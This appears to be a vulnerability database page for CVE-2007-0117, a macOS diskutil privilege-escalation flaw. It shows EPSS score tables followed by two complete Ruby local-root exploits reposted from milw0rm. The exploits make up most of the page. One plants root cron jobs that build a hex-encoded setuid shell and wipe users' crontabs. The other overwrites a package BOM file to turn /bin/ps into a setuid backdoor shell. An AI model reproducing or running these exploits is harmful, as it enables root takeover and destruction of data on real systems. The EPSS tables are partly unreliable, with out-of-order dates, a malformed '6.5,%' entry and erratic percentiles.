CVE-2007-0117 : Detail

The EPSS model produces a probability score between 0 and 1 (0 and 100%). The higher the score, the greater the probability that a vulnerability will be exploited.

Date	EPSS V0	EPSS V1	EPSS V2 (> 2022-02-04)	EPSS V3 (> 2025-03-07)	EPSS V4 (> 2025-03-17)
2022-02-06	–	–	3.69%	–	–
2022-04-03	–	–	3.69%	–	–
2022-04-10	–	–	3.69%	–	–
2022-10-23	–	–	3.69%	–	–
2023-01-01	–	–	3.69%	–	–
2023-01-15	–	–	3.69%	–	–
2023-03-12	–	–	–	0.73%	–
2023-09-03	–	–	–	0.71%	–
2024-02-11	–	–	–	0.71%	–
2024-06-02	–	–	–	0.71%	–
2024-06-02	–	–	–	0.71%	–
2024-06-30	–	–	–	0.71%	–
2024-12-22	–	–	–	0.71%	–
2025-03-02	–	–	–	0.71%	–
2025-01-19	–	–	–	0.71%	–
2025-03-09	–	–	–	0.71%	–
2025-03-18	–	–	–	–	5.75%
2025-03-30	–	–	–	–	6.5%
2025-03-30	–	–	–	–	6.5,%

The percentile is used to rank CVE according to their EPSS score. For example, a CVE in the 95th percentile according to its EPSS score is more likely to be exploited than 95% of other CVE. Thus, the percentile is used to compare the EPSS score of a CVE with that of other CVE.

Date	Percentile
2022-02-06	67%
2022-04-03	83%
2022-04-10	84%
2022-10-23	85%
2023-01-01	84%
2023-01-15	85%
2023-03-12	78%
2023-09-03	78%
2024-02-11	8%
2024-06-02	8%
2024-06-02	8%
2024-06-30	81%
2024-12-22	8%
2025-03-02	81%
2025-01-19	8%
2025-03-09	81%
2025-03-18	9%
2025-03-30	9%
2025-03-30	9%

#!/usr/bin/ruby # (c) 2006 LMH <lmh [at] info-pull.com> (code from the other exploit, porting) # Kevin Finisterre <kf_lists [at] digitalmunition.com> (crontab rock and roll) # # Second exploit for MOAB-05-01-2007, uses crontab. much more simple than the other one. # And works like a charm. require 'fileutils' EVIL_COMMANDS = [ "rm /Library/Receipts/Essentials.pkg/Contents/Archive.bom ", "echo -e \"\\x6d\\x61\\x69\\x6e\\x28\\x29\\x7b\\x20\\x73\\x65\\x74\\x65\\x75\\x69\\x64\\x28\\x30\\x29\\x3b\\x20\\x73\\x65\\x74\\x65\\x67\\x69\\x64\\x28\\x30\\x29\\x3b\\x20\\x73\\x65\\x74\\x75\\x69\\x64\\x28\\x30\\x29\\x3b\\x20\\x73\\x65\\x74\\x67\\x69\\x64\\x28\\x30\\x29\\x3b\\x20\\x73\\x79\\x73\\x74\\x65\\x6d\\x28\\x22\\x2f\\x62\\x69\\x6e\\x2f\\x73\\x68\\x20\\x2d\\x69\\x22\\x29\\x3b\\x20\\x7d\\x0a\" > /tmp/finisterre.c", "/usr/bin/cc -o /Users/Shared/shX /tmp/finisterre.c; rm /tmp/finisterre.c", "/bin/cp -r /var/cron/tabs /Users/Shared", # I have no legit crontabs so I don't care. "/usr/bin/say Flavor Flave a k a `whoami` && sleep 5 && /usr/bin/say sleeping briefly && sleep 5 && chmod +s /Users/Shared/shX && sleep 5", "echo '' > /tmp/pwnclean", "for each in `ls /var/cron/tabs/`; do crontab -u $each /tmp/pwnclean; done", # Sorry if you had any legit crontabs... "crontab /tmp/pwnclean", # Just to make sure "rm -rf /tmp/pwn*", ] TARGET_BOM_PATH = "/Library/Receipts/Essentials.pkg/Contents/Archive.bom" SHELL_TEMPLATE = "mkdir -p /tmp/pwndertino/var/cron/tabs\n" + "cd /tmp/pwndertino\n" + "chmod 777 var/cron/tabs\n" + "mkbom . /tmp/pwned.bom\n" + "cp /tmp/pwned.bom #{TARGET_BOM_PATH}\n" + "/usr/sbin/diskutil repairPermissions /\n" if ARGV[0] != "repair" # Backup if its there! Some times it is not. if File.exists?(TARGET_BOM_PATH) FileUtils.cp(TARGET_BOM_PATH, File.join("/Users/Shared", File.basename(TARGET_BOM_PATH))) end puts "++ Dropping the 31337 .sh skillz" shell_script = File.new("moab5.sh", "w") shell_script.print(SHELL_TEMPLATE) puts "++ Fixing up crontabs" EVIL_COMMANDS.each do |cmd| shell_script.print("echo '* * * * * #{cmd}' >> /var/cron/tabs/root\n") end shell_script.print("echo '* * * * * /bin/rm -rf /tmp/pwned.bom /tmp/pwndertino' >> /tmp/pwncron\n") shell_script.print("crontab /tmp/pwncron\n") # You may need to sleep here shell_script.close puts "++ Execute moab5.sh" FileUtils.chmod 0755, "./moab5.sh" exec "/bin/sh", "-c", "./moab5.sh" puts "++ Run the repair script when you are all done." else # minor repair for a post-testing scenario if File.exists?(File.join("/Users/Shared", File.basename(TARGET_BOM_PATH))) FileUtils.cp(File.join("/Users/Shared", File.basename(TARGET_BOM_PATH)), TARGET_BOM_PATH) # restore backup FileUtils.rm_f(File.join("/Users/Shared", File.basename(TARGET_BOM_PATH))) exec "/usr/sbin/diskutil repairPermissions /" else exec "/usr/sbin/diskutil repairPermissions /" end end # milw0rm.com [2007-01-05]

#!/usr/bin/ruby # (c) 2006 LMH <lmh [at] info-pull.com> # Kevin Finisterre <kf_lists [at] digitalmunition.com> # # Thanks to The French Connection for bringing this in-the-wild 0-day to # our attention. If /tmp/ps2 exists on your system, you've been pwned already. # Thanks to the original authors of the exploit ('meow'). You know who you are. # # "They did it for the lulz" - A Fakecure spokesperson on the 'Mother Of all Bombs'. # "kcoc kcus I ro tcarter uoY" - The Original Drama P3dobear (Kumo' n'). # require 'fileutils' # Basic configuration TARGET_BINARY = "/bin/ps" # Changing this requires you to create a new TEH_EVIL_BOM TARGET_BACKUP_PATH = "/tmp/ps2" # see: "man lsbom" and "man mkbom" TARGET_SHELL_PATH = "/usr/bin/id" # Ensure the binary doesn't drop privileges! BOMARCHIVE_PATH = "/Library/Receipts/Essentials.pkg/Contents/Archive.bom" DISKUTIL_PATH = "/usr/sbin/diskutil" TEH_EVIL_BOM = File.read("Evil.bom") # # Repair a rogue installation using the back-up files. Useful for testing. # Probably you don't want to repair on real pwnage... :-) # def do_repair() puts "++ Repairing (moving back-ups to original path)" puts "++ #{File.basename(BOMARCHIVE_PATH)}" FileUtils.rm_f BOMARCHIVE_PATH FileUtils.cp File.join("/tmp", File.basename(BOMARCHIVE_PATH)), BOMARCHIVE_PATH puts "++ #{TARGET_BINARY}" FileUtils.rm_f TARGET_BINARY FileUtils.cp TARGET_BACKUP_PATH, TARGET_BINARY puts "++ Removing back-ups..." FileUtils.rm_f TARGET_BACKUP_PATH FileUtils.rm_f File.join("/tmp", File.basename(BOMARCHIVE_PATH)) puts "++ Done. Repairing disk permissions..." exec "#{DISKUTIL_PATH} repairPermissions /" end # # Ovewrite TARGET_BINARY with TARGET_SHELL_PATH and set the rogue permissions unless # they are already properly set. # def exploit_bomb() puts "++ We get signal. Overwriting #{TARGET_BINARY} with #{TARGET_SHELL_PATH}." # Overwriting with this method will always work well if binary at TARGET_SHELL_PATH # is bigger than TARGET_BINARY (ex. /bin/sh is 1068844 bytes and /bin/ps is 68432). # An alternative method is running diskutil again to set the rogue permissions. over = File.new(TARGET_BINARY, "w") over.write(File.read(TARGET_SHELL_PATH)) over.close unless FileTest.setuid?(TARGET_BINARY) fork do FileUtils.rm_f TARGET_BINARY FileUtils.cp TARGET_SHELL_PATH, TARGET_BINARY exec "#{DISKUTIL_PATH} repairPermissions /" end Process.wait end puts "++ Done. Happy ruuting." end # # Overwrite the BOM with the rogue version, set new permissions. # def set_up_the_bomb() puts "++ Preparing to overwrite (#{BOMARCHIVE_PATH})" # Back-up the original Archive.bom, set mode to 777 if FileTest.writable?(BOMARCHIVE_PATH) backup_path = File.join("/tmp", File.basename(BOMARCHIVE_PATH)) unless FileTest.exists?(backup_path) puts "++ Creating backup copy at #{backup_path}" FileUtils.cp BOMARCHIVE_PATH, backup_path end puts "++ Removing original file." FileUtils.rm_f BOMARCHIVE_PATH puts "++ Writing backdoor BOM file." target_bom = File.new(BOMARCHIVE_PATH, "w") target_bom.write(TEH_EVIL_BOM) target_bom.close puts "++ Done." else puts "-- Can't write to '#{BOMARCHIVE_PATH}. No pwnage for you today." exit end # Back-up the target backdoor path unless FileTest.exists?(TARGET_BACKUP_PATH) puts "++ Creating backup copy of #{TARGET_BINARY} at #{TARGET_BACKUP_PATH}" FileUtils.cp TARGET_BINARY, TARGET_BACKUP_PATH end # Let diskutil do it's job (set permissions over target binary path, setuid) puts "++ Running diskutil to set the new permissions for the backdoor..." fork do exec "#{DISKUTIL_PATH} repairPermissions /" end Process.wait puts "++ Somebody set up us the bomb!" exploit_bomb() end # Here be pwnies if ARGV[0] == "repair" do_repair() else set_up_the_bomb() end # milw0rm.com [2007-01-05]